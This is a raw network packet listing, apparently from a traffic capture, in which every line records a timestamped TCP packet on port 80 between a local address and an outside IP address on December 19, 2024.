                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.145665884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.145685911 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.145817041 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.146578074 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.146656990 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.146702051 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.146861076 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.147644997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.147743940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.147754908 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.147891998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.148693085 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.148786068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.149142981 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.149693966 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.149835110 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.149872065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.150749922 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.150949955 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.150990009 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.151787043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.151876926 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.151916981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.152090073 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.152839899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.152894020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.152965069 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.153944016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.154047012 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.154084921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.154239893 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.155003071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.155158997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.155261993 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.155931950 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.156002998 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.156060934 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.156351089 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.156989098 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.157094955 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.157134056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.157303095 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.158036947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.158149958 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.158186913 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.158319950 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.159060001 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.159255981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.159293890 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.159828901 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.160132885 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.160242081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.161130905 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.161161900 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.161283016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.161322117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.162070036 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.162162066 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.162261963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.162286043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.162527084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.163232088 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.163378954 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.163486958 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.164271116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.164374113 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.164405107 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.164525986 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.165318012 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.165443897 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.165481091 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.166193008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.166333914 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.166460991 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.166467905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.166713953 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.167392015 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.167444944 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.167534113 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.167587996 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.168453932 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.168566942 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.168631077 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.169500113 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.169574976 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.169610023 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.169698000 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.170506001 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.170633078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.170649052 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.170748949 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.171591997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.171679974 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.171725035 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.171849012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.172596931 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.172703981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.172785997 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.172785997 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.173609972 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.173748970 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.174375057 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.174654007 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.174765110 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.174789906 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.174936056 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.175723076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.175795078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.175827026 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.175991058 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.176750898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.176804066 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.177035093 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.177777052 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.177829981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.177911997 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.178828955 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.178947926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.179011106 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.179840088 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.179928064 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.317317009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.317445040 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.317594051 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.317781925 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.317934036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.317958117 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.318661928 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.318842888 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.318960905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.318984985 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.319086075 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.319880009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.319938898 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.319993973 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.320950031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.321039915 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.321068048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.321546078 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.321983099 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.322112083 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.322124958 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.322205067 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.322998047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.323136091 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.323142052 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.323235989 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.324052095 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.324168921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.325068951 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.325119019 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.325191975 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.325287104 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.326133966 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.326247931 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.326308012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.327158928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.327241898 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.327266932 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.327478886 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.328205109 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.328254938 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.328275919 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.328479052 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.329236031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.329354048 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.330285072 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.330316067 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.330353975 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.330961943 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.331342936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.331485033 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.331541061 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.332001925 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.332360983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.332475901 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.332668066 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.333450079 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.333508015 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.333595037 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.333642006 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.334446907 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.334557056 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.334578991 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.335480928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.335586071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.335611105 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.336086988 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.336549044 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.336649895 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.336705923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.337558985 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.337671041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.337769032 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.338625908 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.338720083 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.338731050 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.338857889 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.339669943 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.339754105 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.339773893 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.339960098 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.340662956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.340715885 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.341487885 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.341766119 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.341886997 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.341907024 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.342068911 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.342777014 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.342920065 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.342957020 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.343410969 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.343830109 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.343878031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.343902111 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.343981981 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.344835043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.344976902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.345758915 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.345890999 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.345999956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.346023083 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.346193075 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.346944094 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.347080946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.347310066 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.348006964 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.348108053 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.348227978 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.349036932 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.349128008 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.349147081 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.349231005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.350040913 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.350152969 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.350177050 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.351097107 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.351233959 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.351259947 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.351465940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.352137089 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.352238894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.352313042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.353162050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.353291035 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.353315115 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.354180098 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.354207039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.354270935 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.354341030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.354490042 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.355252981 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.355338097 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.355384111 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.355443954 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.356300116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.356357098 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.356399059 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.356445074 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.357333899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.357391119 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.357459068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.357489109 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.358376980 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.358452082 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.358495951 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.358598948 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.359440088 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.359503984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.359545946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.359602928 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.360472918 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.360532999 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.360584021 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.360758066 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:22.361495972 CET804978731.41.244.11192.168.2.4
